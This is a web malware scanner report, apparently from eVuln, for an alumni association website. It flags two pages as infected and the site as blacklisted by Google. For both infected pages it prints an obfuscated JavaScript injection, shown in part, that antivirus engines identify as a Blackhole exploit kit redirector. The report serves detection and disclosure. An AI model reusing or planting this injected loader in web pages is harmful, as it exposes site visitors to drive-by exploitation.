Malware Scanner report for nths-saxonalumni.org

Malicious/Suspicious/Total urls checked: 2/0/15

2 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "nths-saxonalumni.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/4

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=nths-saxonalumni.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://nths-saxonalumni.org/	403 Forbidden Content-Length: 45851 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) r=eval;ps="s"+"p"+"l"+"i"+"t";function asd(){++(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,171,165,152,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,171,165,152,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,162,166,154,163,157,174,160,172,175,150,165,150,150,171,173,65,165,163,66,77,140,155,112,173,15 ... 3003 bytes are skipped ...57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=36}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.DD.38 Avast JS:Includer-AHM [Trj] Ad-Aware JS:Exploit.BlackHole.AP Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP TrendMicro-HouseCall TROJ_GEN.F47V1202 Comodo TrojWare.JS.Blacole.UD McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.ND MicroWorld-eScan JS:Exploit.BlackHole.AP Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cbsyko F-Secure JS:Exploit.BlackHole.AP VIPRE Trojan.JS.BlacoleRef.dd (v) AVG JS/Exploit Norman Blacole.VJ GData JS:Exploit.BlackHole.AP BitDefender JS:Exploit.BlackHole.AP
http://nths-saxonalumni.org/media/system/js/mootools-core.js	200 OK Content-Length: 96362 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/media/system/js/core.js	200 OK Content-Length: 4784 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/media/system/js/caption.js	200 OK Content-Length: 729 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/media/system/js/modal.js	200 OK Content-Length: 9732 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/jak_compressed.js	200 OK Content-Length: 45170 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/lightbox_compressed.js	200 OK Content-Length: 38658 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/jak_slideshow.js	200 OK Content-Length: 3511 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/window_compressed.js	200 OK Content-Length: 3942 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/components/com_phocagallery/assets/js/jak/interpolator_compressed.js	200 OK Content-Length: 5315 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/index.php/news	200 OK Content-Length: 70666 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) r=eval;ps="s"+"p"+"l"+"i"+"t";function asd(){++(d.body)};a=("47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,171,165,152,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,171,165,152,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,176,176,176,65,162,166,154,163,157,174,160,172,175,150,165,150,150,171,173,65,165,163,66,77,140,155,112,173,15 ... 3003 bytes are skipped ...57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21"[ps](","));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=36}catch(pq){yy=1;}if(!yy)r(String["fr"+"omCharCode"].apply(String,a)); Antivirus reports: AntiVir JS/BlacoleRef.DD.38 Avast JS:Includer-AHM [Trj] Ad-Aware JS:Exploit.BlackHole.AP Ikarus Trojan.JS.BlacoleRef nProtect JS:Exploit.BlackHole.AP TrendMicro-HouseCall TROJ_GEN.F47V1202 Comodo TrojWare.JS.Blacole.UD McAfee-GW-Edition JS/Exploit-Blacole.ht TrendMicro HEUR_HTJS.HDJSFN Microsoft Exploit:JS/Blacole.ND MicroWorld-eScan JS:Exploit.BlackHole.AP Fortinet JS/Redirector.BOZ!tr McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Expack.cbsyko F-Secure JS:Exploit.BlackHole.AP VIPRE Trojan.JS.BlacoleRef.dd (v) AVG JS/Exploit Norman Blacole.VJ GData JS:Exploit.BlackHole.AP BitDefender JS:Exploit.BlackHole.AP
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/behaviour.js	200 OK Content-Length: 1211 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/jwplayer.js	200 OK Content-Length: 140107 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/wmvplayer/silverlight.js	200 OK Content-Length: 17901 Content-Type: application/javascript	clean
http://nths-saxonalumni.org/plugins/content/jw_allvideos/jw_allvideos/includes/js/wmvplayer/wmvplayer.js	200 OK Content-Length: 24010 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: nths-saxonalumni.org

Result:
HTTP/1.1 403 Forbidden
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0, no-cache
Connection: close
Date: Fri, 26 Dec 2014 16:51:25 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 26 Dec 2014 16:51:27 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: df1391ec537fa4bf6137df8f9c1db891=0MEGvTFDtzwo0DdL3nLuX2; path=/

Second query (visit from search engine):
GET / HTTP/1.1
Host: nths-saxonalumni.org
Referer: http://www.google.com/search?q=nths-saxonalumni.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for nths-saxonalumni.org

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools